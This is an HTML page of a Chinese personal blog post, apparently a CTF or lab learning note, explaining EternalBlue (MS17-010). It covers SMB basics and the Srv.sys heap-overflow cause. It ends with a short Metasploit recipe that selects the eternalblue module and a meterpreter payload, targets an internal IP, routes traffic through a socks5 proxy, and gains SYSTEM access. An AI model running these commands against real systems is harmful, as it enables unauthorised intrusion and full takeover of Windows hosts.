<!DOCTYPE html>
<html lang="en" color-mode="dark">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="author" content="Rufeii" />
  <!-- Open Graph Description 简短摘要-->
  
  <!-- 用于搜索引擎的文章摘要 -->
  
  
  
  <title>
    
      了解永恒之蓝 
      
      
      |
    
     Rufeii
  </title>

  
    <link rel="apple-touch-icon" href="/images/me.jpg">
    <link rel="icon" href="/images/me.jpg">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<meta name="generator" content="Hexo 7.3.0"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/me.jpg" alt="">
      
    </a>
    <div class="nickname"><a href="/">Rufeii</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/search/">
          <a href="/search/">Search</a>
        </li>
      
        <li class="nav-item" data-path="/links/">
          <a href="/links/">Links</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">了解永恒之蓝</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="Update time"></i>
          2025-12-03 18:52:19
        </span>
        
      </div>
      <div class="markdown-body">
        <h2 id="什么是永恒之蓝"><a href="#什么是永恒之蓝" class="headerlink" title="什么是永恒之蓝"></a>什么是永恒之蓝</h2><p>永恒之蓝是一种利用Windows系统的SMB协议漏洞来获取系统最高权限，以此来控制被入侵的计算机的工具</p>
<p>编号为：<strong>MS17-010</strong></p>
<h2 id="SMB协议"><a href="#SMB协议" class="headerlink" title="SMB协议"></a>SMB协议</h2><blockquote>
<p>SMB 通信协议主要是作为 Microsoft 网络的通讯协议。SMB 是在会话层（session layer）和表示层（presentation layer）以及小部分应用层（application layer）的协议。SMB 使用了 NetBIOS 的应用程序接口 （Application Program Interface，简称 API），一般端口使用为 139，445</p>
<p>协议服务器信息块，它是一种客户机 &#x2F; 服务器、请求 &#x2F; 响应协议，通过 SMB 协议可以在计算机间共享文件、打印机、命名管道等资源，电脑上的网上邻居就是靠 SMB 实现的，SMB 协议工作在应用层和会话层，可以用在 TCP&#x2F;IP 协议之上</p>
</blockquote>
<p>简单来说SMB就是Windows 里的“共享文件&#x2F;共享打印机”的协议。你在内网里内网里访问别人电脑里的共享文件夹就是SMB在工作！</p>
<h2 id="SMB原理"><a href="#SMB原理" class="headerlink" title="SMB原理"></a>SMB原理</h2><blockquote>
<p>首先客户端发送一个 SMB negport 请求数据报，并列出它所支持的所有 SMB 的协议版本。</p>
<p>服务器收到请求消息后响应请求，并列出希望使用的 SMB 协议版本。如果没有可以使用的协议版本则返回 0XFFFFH，结束通信。</p>
<p>协议确定后，客户端进程向服务器发起一个用户或共享的认证，这个过程是通过发送 SessetupX 请求数据包实现的。</p>
<p>客户端发送一对用户名和密码或一个简单密码到服务器，然后通过服务器发送一个 SessetupX 应答数据包来允许或拒绝本次连接。</p>
<p>当客户端和服务器完成了磋商和认证之后，它会发送一个 Tcon 或 TconX SMB 数据报并列出它想访问的网络资源的名称，之后会发送一个 TconX 应答数据报以表示此次连接是否接收或拒绝。</p>
<p>连接到相应资源后，SMB 客户端就能够通过 open SMB 打开一个文件，通过 read SMB 读取文件，通过 write SMB 写入文件，通过 close SMB 关闭文件</p>
</blockquote>
<p>简单来说就是：确定SMB协议版本 → 建立连接 → 客户端操作文件</p>
<h2 id="漏洞原理"><a href="#漏洞原理" class="headerlink" title="漏洞原理"></a>漏洞原理</h2><blockquote>
<p>SMB 是 Windows 系统中用于文件共享、打印服务的网络协议，EternalBlue 针对的是 <strong>SMBv1 协议栈</strong>。</p>
<p>问题出在 <code>Srv.sys</code> 内核驱动对特定 <strong>Trans2 请求</strong> 的处理中存在内存错误</p>
<p>攻击者伪造一个恶意 SMB 请求包，伪装成 <strong>文件传输请求（Trans2_SESSION_SETUP）</strong>，该请求包含精心构造的大小字段</p>
<blockquote>
<p>分配一个小缓冲区（比如 1024 字节） 然后试图写入比它更大的数据（比如 4096 字节）</p>
</blockquote>
<p>最终导致 <strong>内存越界写（Heap Overflow）</strong></p>
<p>由于是 <strong>内核态驱动</strong>处理这个请求，攻击者能利用溢出控制某些结构，最终劫持执行流（比如修改函数指针），达到：</p>
<ul>
<li>提权（Ring 3 → Ring 0）</li>
<li>执行恶意 shellcode</li>
<li>植入木马 &#x2F; 后门</li>
</ul>
</blockquote>
<p>不懂也没关系，了解到它是通过内存溢出导致的就行了，关键是会用</p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><p>在kali里面去用msf</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">proxychains4 msfconsole    //让它的网络流量通过代理服务器转发</span><br><span class="line">use exploit/windows/smb/ms17<span class="built_in">_</span>010<span class="built_in">_</span>eternalblue  //启动后直接选择漏洞利用模块</span><br><span class="line">set payload windows/x64/meterpreter/bind<span class="built_in">_</span>tcp<span class="built_in">_</span>uuid //攻击成功后要运行的 payload</span><br><span class="line">set RHOSTS 172.22.1.21  //设置要攻击的目标机器的 ip</span><br><span class="line">exploit   //攻击</span><br></pre></td></tr></table></figure>

<p>代理修改在&#x2F;etc&#x2F;proxychains.conf</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[ProxyList]</span><br><span class="line">socks5 ip port</span><br></pre></td></tr></table></figure>

<p>打进去之后就是system权限了</p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/2025/12/03/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9CInitial/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>Prev</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="Update time"></i>
              2025-12-03 18:52:19
            </span>
            
          </div>
          <div class="post-foot-prev">
            
              <a href="/2025/12/09/ISCTF2025/" target="_self">
                <span>Next</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">Contents</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%80%E4%B9%88%E6%98%AF%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D"><span class="toc-text">什么是永恒之蓝</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SMB%E5%8D%8F%E8%AE%AE"><span class="toc-text">SMB协议</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SMB%E5%8E%9F%E7%90%86"><span class="toc-text">SMB原理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86"><span class="toc-text">漏洞原理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-text">漏洞利用</span></a></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          
              <a title="github" target="_blank" rel="noopener" href="https://github.com/rufeii/rufeii.github.io">
                <i class="iconfont icon-github"></i>
              </a>
              
        </li>
        
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a href="/">Copyright © 2026 Rufeii</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        


        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + %E4%BA%86%E8%A7%A3%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D + '&url=' + https%3A%2F%2Frufeii.github.io%2F2025%2F12%2F03%2F%25E4%25BA%2586%25E8%25A7%25A3%25E6%25B0%25B8%25E6%2581%2592%25E4%25B9%258B%25E8%2593%259D%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=https://rufeii.github.io/2025/12/03/%E4%BA%86%E8%A7%A3%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
